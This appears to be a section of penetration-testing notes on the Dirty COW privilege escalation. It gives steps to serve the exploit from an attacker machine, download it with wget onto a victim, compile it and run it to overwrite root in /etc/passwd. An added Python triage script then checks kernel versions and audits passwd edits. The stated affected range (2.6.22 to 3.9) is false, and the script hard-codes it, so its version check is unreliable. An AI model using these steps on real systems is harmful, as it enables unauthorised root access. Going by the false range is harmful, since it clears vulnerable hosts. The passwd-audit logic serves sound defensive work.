5.2.1 Kernel Exploitation
Kernel Exploit (PoC)
Dirty COW
This exploit uses the pokemon exploit of the dirtycow vulnerability as a base and automatically generates a new passwd line. The user is prompted for the new password when the binary is run. The original /etc/passwd file is then backed up to /tmp/passwd.bak and the root account is overwritten with the generated line. After running the exploit you should be able to log in as the newly created user.
This exploit works only for Linux kernel versions between 2.6.22 and 3.9; the running kernel version can be checked with the command uname -a.
Transfer the source to the victim machine, compile it with gcc, and run it:
#launch python -m SimpleHTTPServer on attacker machine
#download it on victim machine using: wget http://target_IP:8000/dirtycowexploit.c
gcc -pthread dirtycowexploit.c -o dirtycow -lcrypt
chmod +x dirtycow
./dirtycow
The exploit creates a new username and password pair with root privileges.
After logging in with these credentials, the effective user and group can be checked with the id or whoami command.
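A defender-side triage script covering the two checks this section implies: whether a kernel release sits in the version range stated above (2.6.22 through 3.9, taken exactly as the page gives it), and whether /etc/passwd shows the traces the PoC leaves behind (the root line replaced by a new uid-0 user whose password hash is stored directly in the file, plus the /tmp/passwd.bak backup). This is an added example written for this page, not the page's own code or the dirtycow PoC; the sample passwd contents, the account name newadmin and the placeholder hash are constructed.

```python
"""
Triage helper for the Dirty COW scenario above: classify a kernel release
against the page's stated affected range and diff /etc/passwd against a
trusted baseline for the edits the PoC makes. Added example, not from the page.
"""
import os
import re
from typing import Dict, List, Tuple

# Affected range as stated on the page (inclusive); any 3.9.x counts as 3.9.
AFFECTED_MIN = (2, 6, 22)
AFFECTED_MAX = (3, 9)


def parse_kernel_release(release: str) -> Tuple[int, ...]:
    """Numeric prefix of `uname -r` output as an int tuple.
    '3.13.0-24-generic' -> (3, 13, 0); '2.6.32-696.el6.x86_64' -> (2, 6, 32)."""
    match = re.match(r"\s*(\d+(?:\.\d+)*)", release)
    if not match:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(part) for part in match.group(1).split("."))


def kernel_in_affected_range(release: str) -> bool:
    """True when the release is inside the page's stated range.
    Tuple comparison copes with missing components: (2, 6) < (2, 6, 22)."""
    version = parse_kernel_release(release)
    return version >= AFFECTED_MIN and version[:2] <= AFFECTED_MAX


def parse_passwd(text: str) -> Dict[str, List[str]]:
    """Map username -> the seven passwd fields; malformed lines are skipped."""
    entries: Dict[str, List[str]] = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2].isdigit():
            entries[fields[0]] = fields
    return entries


def audit_passwd(baseline: str, current: str) -> List[str]:
    """Compare a trusted baseline copy of /etc/passwd with the live one and
    return findings matching what the PoC above does to the file."""
    base = parse_passwd(baseline)
    cur = parse_passwd(current)
    findings: List[str] = []

    for name, fields in cur.items():
        uid = int(fields[2])
        # A uid-0 account absent from the baseline, or an existing account whose
        # uid became 0, is the "new root user" the PoC writes into the file.
        if uid == 0 and (name not in base or int(base[name][2]) != 0):
            findings.append(f"uid-0 account {name!r} not in baseline")
        # Normal systems keep 'x' here and the hash in /etc/shadow; a hash in
        # this field is the signature of a hand-crafted passwd line.
        if fields[1] not in ("x", "*", "!", ""):
            findings.append(f"account {name!r} stores a password hash in /etc/passwd")

    for name in base:
        if name not in cur:
            findings.append(f"account {name!r} present in baseline but missing now")

    return findings


def backup_artifact_present(path: str = "/tmp/passwd.bak") -> bool:
    """The PoC backs the original file up to /tmp/passwd.bak; its presence on a
    host is a cheap indicator worth collecting during triage."""
    return os.path.exists(path)


# Constructed sample data: a clean baseline and a copy edited the way the PoC
# edits it (root line replaced; placeholder hash, not real crypt output).
BASELINE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
)
TAMPERED_PASSWD = (
    "newadmin:$6$PLACEHOLDER$PLACEHOLDER:0:0:pwned:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
)


if __name__ == "__main__":
    for rel in ("2.6.32-696.el6.x86_64", "3.9.11", "3.13.0-24-generic"):
        print(f"{rel}: in stated affected range = {kernel_in_affected_range(rel)}")
    for finding in audit_passwd(BASELINE_PASSWD, TAMPERED_PASSWD):
        print("FINDING:", finding)
    print("backup artifact present:", backup_artifact_present())
```

On a live host, feed `audit_passwd` the contents of a known-good copy of /etc/passwd (from configuration management or a file-integrity baseline) and the current file; the three findings the constructed sample produces (new uid-0 account, hash stored in passwd, root entry gone) are the ones to expect after this PoC has run.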